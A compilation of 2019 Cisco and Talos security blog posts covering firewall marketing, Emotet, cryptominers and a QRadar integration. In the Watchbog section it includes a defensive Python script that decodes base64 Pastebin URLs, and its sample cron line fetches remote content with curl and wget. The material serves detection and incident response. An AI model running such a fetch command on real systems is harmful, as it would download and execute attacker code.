Cisco Named a Leader in the 2019 Gartner Magic Quadrant for Network Firewalls

By Dr. Gee Rittenhouse

The network is at the heart of the digital transformation, and when it comes to securing it, the firewall remains the frontline of defense for organizations. But as the network continues to evolve, we know that security must adapt. For Cisco, this means providing network security that has world-class controls in every place you need them, with unified policy and threat visibility. We have made significant strides towards that vision over the past 12 months, and it is always gratifying when the market acknowledges it.
To that end, I am thrilled to share that Gartner has once again named Cisco a Leader in the Magic Quadrant for Network Firewalls. We believe this recognition validates our multi-year journey to reimagine the firewall as the foundation of a truly integrated security platform.
Cisco has demonstrated its leadership in the market through continuous investment in innovation, including:
Cisco Defense Orchestrator (CDO). At Cisco Live U.S., we launched CDO, a cloud-based, API-driven product that simplifies and unifies policy and device management. From a single interface, you can now seamlessly orchestrate policy changes across all of your ASA, NGFW and Meraki MX devices.
Firepower with Cisco Threat Response (CTR). CTR accelerates detection, investigation and remediation of threats by automating integrations across Cisco Security products and threat intelligence sources. With the new Firepower integration, CTR can now utilize intrusion alerts from Firepower devices to cut through the noise and deliver curated alerts that truly need your attention.
New NGFW appliances. Earlier this year, we released new NGFW appliances that couple ease of use with deep visibility to protect your business – whether you are an SMB, a service provider, or anything in between. With a strong cost-to-performance ratio, they offer a dramatic 3.5x performance boost over previous ASA and Firepower appliances, plus unique hardware-based capabilities for inspecting encrypted traffic.
These advancements, in addition to many others, have cemented our place in the next-generation firewall market. But we know that in order to deliver truly effective security, the firewall needs to be part of a larger integrated architecture that spans all threat vectors.
This is why Cisco has invested in building the broadest and most effective portfolio that spans the network, endpoint, cloud and workload. And now we are doing the hard work of integrating the products to create a security platform that can automatically share threat intelligence, policy information, and event data. As a result, you have visibility across all attack vectors, and when a Cisco Security product sees a threat in one place, the whole integrated system can automatically stop the threat everywhere across your IT ecosystem.
So, when you invest in Cisco NGFW, you are investing in a foundation for security that is agile and integrated, giving you the strongest security posture available.

Download the 2019 Gartner Magic Quadrant for Network Firewalls

Visit Cisco.com/go/NGFW to learn more about how Cisco NGFW can help secure your organization.

2019 Gartner Magic Quadrant for Network Firewalls, Rajpreet Kaur, Adam Hils, Jeremy D’Hoinne, John Watts, September 17, 2019.
Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Source:: Cisco Security Notice

Emotet is back after a summer break

By Talos Group

This blog post was written by Colin Grady, William Largent, and Jaeson Schultz.
Emotet is still evolving, five years after its debut as a banking trojan. It is one of the world’s most dangerous botnets and malware droppers-for-hire. The malware payloads dropped by Emotet serve to more fully monetize their attacks, and often include additional banking trojans, information stealers, email harvesters, self-propagation mechanisms and even ransomware.
At the beginning of June 2019, Emotet’s operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer began drawing to a close, Talos and other researchers started to see increased activity in Emotet’s C2 infrastructure. As of Sept. 16, 2019, the Emotet botnet has fully reawakened and has resumed spamming operations. While this reemergence may have many users scared, Talos’ traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as will traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.
Read More


Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”

By Talos Group

By Christopher Evans and David Liebenberg.
Executive summary
A new threat actor named “Panda” has generated thousands of dollars’ worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we’ve ever seen, but it still has been one of the most active attackers we’ve seen in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, mean that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again that they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns.
Read More >>


Threat Roundup for September 6 to September 13

By Talos Group

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post summarizes the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
Read More
Reference:
TRU09132019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.


New Threat Grid App for IBM QRadar SIEM

By Jessica Bair

Download the app for faster, more effective threat detection and response
Two years ago, Cisco and IBM Security announced a strategic alliance to address the growing threat of cybercrime. This collaboration builds on each organization’s strengths and complementary offerings to provide integrated solutions, managed services and shared threat intelligence to drive more effective security for our joint customers. We continue to develop new applications for IBM’s QRadar security analytics platform and the Cisco Threat Grid app for QRadar with DSM was just released.
Cisco’s Threat Grid App integrates with IBM’s QRadar SIEM, enabling analysts to quickly identify, understand and respond to system threats through the QRadar dashboard. Downloadable via the IBM Security App Exchange, this powerful app combines advanced sandboxing, malware analysis and threat intelligence in one unified solution.
Threat Grid + QRadar enables analysts to quickly determine the behavior of possible malicious files, which have been submitted to Threat Grid, and rapidly drill down from QRadar into the Threat Grid unified malware analysis and threat intelligence platform, for deeper insight. This integration expedites the threat investigation process, with a dashboard view into the highest priority threats, delivered directly through QRadar versus having to pivot on disparate tools and interfaces.
Detailed results from the sandbox analysis of Threat Grid can be aggregated by QRadar to determine whether the potential threats within the organization are malicious or benign. Malware samples are then assigned a Threat Score, and displayed by hash value and the user who submitted the sample.

This information displayed on the Threat Grid dashboard can be used to quickly resolve threats detected by QRadar. This results in improved efficiency and optimization for security analysts, by quickly identifying the top priorities for threat investigation.
With the QRadar DSM capabilities, you can see the analysis results over time.

Also, under Log Activity, for suspicious IP addresses, you can use the right-click to see instant contextual threat intelligence from Threat Grid.

Threat Grid also integrates with IBM Resilient Incident Response Platform (IRP) for automated response and X-Force Exchange for even greater threat intelligence enrichment. For example, analysts in the IRP can look up Indicators of Compromise (IoC) with Cisco Threat Grid’s threat intelligence, or detonate suspected malware with its sandbox technology. This empowers security teams to gain valuable incident data in the moment of response.
These technology integrations between Cisco Security and IBM Security enable a more extensive security architecture for greater speed and efficiency in identifying, investigating, and remediating threats. Together, we deliver the intelligence, automation and analytics required to provide the data and insights that today’s security practitioners require.
Please visit the Cisco and IBM page for the latest information about our partnership, and the Cisco Marketplace for details of the IBM integrations.

Note: Version 1.0.0 of the app has a coding error that limits its compatibility to the Threat Grid US Cloud. A fix adding support for the Threat Grid European cloud and the Threat Grid appliance is in validation testing with IBM.


Watchbog and the Importance of Patching

By Talos Group

By Luke DuCharme and Paul Lee.
What Happened?
Cisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog cryptomining botnet. The attackers were able to exploit CVE-2018-1000861 to gain a foothold and install the Watchbog malware on the affected systems.
This Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker’s intentions and abilities on a customer’s network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts.
There were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover – this attacker did not practice particularly strong operational security.
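Base64-encoded Pastebin URLs of the kind described above are easy to surface from host artifacts once every long base64 token is decoded and checked for a URL. The following Python is an added example written for this post, not CSIRS or Talos tooling: it scans a constructed cron/shell artifact, decodes candidate tokens (tolerating stripped padding and skipping binary garbage), and reports any decoded URL, marking known paste sites; it generalizes to any base64-encoded URL, not only Pastebin. The sample lines and the EXAMPLE paths are invented.

```python
import base64
import binascii
import re

# Constructed sample of the kind of artifact left on a compromised host:
# a cron entry whose download targets are base64-encoded URLs, plus benign
# lines that must not be flagged. All URLs and paths are invented placeholders.
SAMPLE_ARTIFACT = """\
*/10 * * * * (curl -fsSL $(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VYQU1QTEUx | base64 -d) || wget -q -O- $(echo aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvRVhBTVBMRTI= | base64 -d))
echo "hello world"
PATH=/usr/local/bin:/usr/bin:/bin
"""

# Only tokens long enough to carry a URL; short runs are mostly false positives.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"]+")
KNOWN_PASTE_HOSTS = ("pastebin.com",)  # extend with other paste services as needed


def decode_b64_token(token):
    """Decode one base64 token; re-add stripped padding; return printable text or None."""
    padded = token + "=" * (-len(token) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None  # binary payload, not an encoded URL
    return text if text.isprintable() else None


def find_encoded_urls(text):
    """Return (line_no, token, decoded_url, is_paste_site) for every token that decodes to a URL."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for token in B64_TOKEN.findall(line):
            decoded = decode_b64_token(token)
            if decoded is None:
                continue
            for url in URL_RE.findall(decoded):
                host = url.split("/")[2].lower()
                is_paste = any(host == h or host.endswith("." + h) for h in KNOWN_PASTE_HOSTS)
                findings.append((line_no, token, url, is_paste))
    return findings


if __name__ == "__main__":
    for line_no, token, url, is_paste in find_encoded_urls(SAMPLE_ARTIFACT):
        print(f"line {line_no}: {token[:12]}... -> {url} {'[paste site]' if is_paste else ''}")
```

Run the same function over crontabs, shell history, systemd units and startup scripts collected from a suspect host; a decoded paste-site URL in any of them is a strong pivot for the rest of the investigation.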
The attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any “real” hackers could do so. During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the “positive” intentions of this adversary. Below is a message left on a compromised system by the adversary:
Read More at Talosintelligence.com
